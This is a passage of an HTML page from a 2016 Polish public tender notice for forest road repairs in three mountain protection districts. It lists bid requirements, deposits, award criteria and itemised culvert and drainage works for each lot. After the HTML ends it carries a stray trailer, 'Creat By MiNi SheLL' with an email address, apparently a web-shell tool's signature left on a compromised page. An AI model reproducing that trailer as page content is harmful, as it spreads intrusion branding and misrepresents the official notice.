              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego odnoszący się do kierownika budowy wraz z informacjami na temat jego kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez niego czynności oraz informacją o podstawie do dysponowania ta osób .

2.Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określonych czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów inne dokumenty 

3.Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia  publicznego wraz z informacją o podstawie do dysponowania tymi zasobami 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br /> 1)  pakiet nr 1  8000,00 zł słownie: osiem tysięcy zł
 2)  Pakiet nr 2  13000,00 zł słownie :  trzynaście tysięcy zł 
 3) pakiet nr 3  10000,00 zł słownie; dziesięć tysięcy zł 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>80</td></tr><tr><td>okres gwarancji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/09/2016, godzina: 13:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>pakiet nr 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Remont dróg leśnych w Obwodzie Ochronnym Śnieżka
1	Oddz. 32a	wymiana przepustu kamiennego na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	20m2
		wzmocnienie korony drogi obrzeżem z kamienia łupanego	112m
		wbudowanie w nawierzchnię wodopustów z kostki kamiennej 	35m2
		remont cząstkowy nawierzchni drogi 	320m2
2	Oddz.34i,g, 35ab, 36a,b,c,d	wymiana przepustu kamiennego na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	4m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	16m2
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	17m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	60m2
		wymiana na nowe wodospustów z obrzynanych bali drewnianych	168m
		wzmocnienie wodospustów brukowaniem z kamienia łamanego 	70m2
		odtworzenie rowów przy drogach leśnych 	112m3
3	Oddz.34i,	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	15m
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	5m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	80m2
4	Oddz. 45a,b,c,g,h, 44h, 51a,f,l,g, 50a,b,c,d, 38n,j,d,c,a, 48c,b,d,f, 49a,b,c,d 	wykonanie wospustów z profili betonowych wraz z uzupełnieniem nawierzchni tłuczniowej 	200m2
5	Oddz. 56d,64d,f,h, 63g, 71c,gh 	przebrukowanie nawierzchni z kostki kamiennej wraz z uformowaniem pobocza 	125,71m2
		Wymiana istniejącego przepustu na nowy PP 500 wraz ze ze ściankami czołową, wylotową w formie murku oporowego oraz formowaniem rowów na wlocie i wylocie przepustu	6m
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		wymiana przepustu na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	5m
		przebrukowanie nawierzchni z kostki kamiennej wraz z uformowaniem progów poprzecznych 15szt. 	705m2
		przebrukowanie nawierzchni poboczy z kamienia miejscowego	315m2
		oczyszczenie rowu /ścieku kamiennego z roślinności, namułu 	259m2
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233260-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  350000.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>80</td></tr><tr><td>okres gwarancji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>pakiet nr II<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Remont dróg leśnych w Obwodzie Ochronnym Przełęcz
6	Oddz. 123, 136	naprawa nawierzchni brukowanej z kamienia narzutowego, wraz z odtworzeniem kamieni oporowych i wodospustów kamiennych	416m2
		wykonanie nowego przepustu PP 400 wraz ze ściankami czołową, wylotową i odstojnikiem	11m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	44m2
		wykonanie przepustów kamiennych odkrytych w nawierzchni drogi z brukowaniem	38m2
7	Oddz. 113a,b	Remont kładki o nawierzchni drewnianej nad Wrzosówką, wraz z przyczółkami i konstrukcją nośną	40,5m2
		Wykonanie płyt najazdowych z brukowaniem z kostki kamiennej 	14m2
8	Oddz. 113a,b	odtworzenie rowów przy drogach leśnych wraz z umocnieniem korony drogi kamieniem	98m3
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	12m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	40m2
		wykonanie wodospustów z kostki kamiennej 	33,75 m2
		cząstkowy remont nawierzchni tłuczniowej 	223,5 m2
9	Oddz. 116b	Wzmocnienie przyczółków mostu - betonowanie ław fundamentowych	8,14 m3
		uzupełnianie i spoinowanie murów kamiennych	23,83 m2
10	Oddz. 131f, 143b - II Droga 	Wzmocnienie przyczółków mostu - betonowanie ław fundamentowych	5,09m3
		uzupełnianie i spoinowanie murów kamiennych	11,2m2
11	Oddz. 118i	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	20m2
12	oddz. 104/114	wykonanie wodospustów betonowych wraz z uzupełnieniem nawierzchni tłuczniowej	175m2
13	oddz. 118d I droga/"Nowa Droga"	Poszerzanie korony drogi poprzez likwidację skarp wraz z wywiezieniem urobku we wskazane miejsce	6m3
		odtworzenie rowu wraz z umocnieniem korony drogi rodzimymi kamieniami	30m3
		wykonanie wodospustów betonowych wraz z uzupełnieniem nawierzchni tłuczniowej	10m 2
		cząstkowy remont nawierzchni drogi	120m2
14	oddz. 115a/b I droga	wykonanie murów oporowych z kamienia łupanego z oporem z betonu na ławie fundamentowej	50,4m3
		naprawa i uzupełnianie nawierzchni drogi 	135m2
15	Oddz. 122h/m, 135b Droga Modrzewiowa	wymiana przepustu kamiennego na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	9,5m
		wykonanie nowego przepustu PP 400 wraz ze z ściankami czołową, wylotową i odstojnikiem	4,5m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	67,5m2
		poszerzanie korony drogi poprzez likwidację skarp wraz z wywiezieniem urobku we wskazane miejsce	22m3
		odtworzenie rowu wraz z usunięciem dużych głazów i kamieni zalegających w rowie	145m3
16	Oddz. 135b/f Droga Stroma	poszerzanie korony drogi poprzez likwidację skarp wraz z wywiezieniem urobku we wskazane miejsce	60m3
17	Oddz. 145 II Droga 	cząstkowy remont nawierzchni drogi	360m2
18	Oddz. 115c, 122c/d Droga Pod Reglami 	remont nawierzchni tłuczniowej drogi 	465m2
		wykonanie wodospustów betonowych wraz z uzupełnieniem nawierzchni tłuczniowej	22,5m2
19	oddz. 114/115	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	20m2
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233260-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  350000.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>80</td></tr><tr><td>okres gwarancji </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>pakiet nr III<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Remont dróg leśnych w Obwodzie Ochronnym Szrenica 
20	Oddz. 179 a,b,c, 178 a,b 	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	24m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	96m2
21	Oddz. 184b	wykonanie nowego przepustu PP 500 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	24m2
22	Oddz. 214 f,g	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	5m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	24m2
		Wykonanie wodospustu powierzchniowego z kostki kamiennej 	15,75m2
		odtworzenie rowu wraz z usunięciem dużych głazów i kamieni zalegających w rowie	910m3
		remont muru oporowego z kamienia układanego na sucho, z betonowaniem ławy fundamentowej i spinowaniem murów 	241,6m3
		wykonanie nowego przepustu PP 500 wraz ze ściankami czołową i odstojnikiem	7,5m
		wykonanie nowego przepustu PP 400 wraz ze ściankami czołową i odstojnikiem	7,5m
		Odbudowa nawierzchni tłuczniowej 	280m2
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233260-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  350000.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>80</td></tr><tr><td>okres gwarancji </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com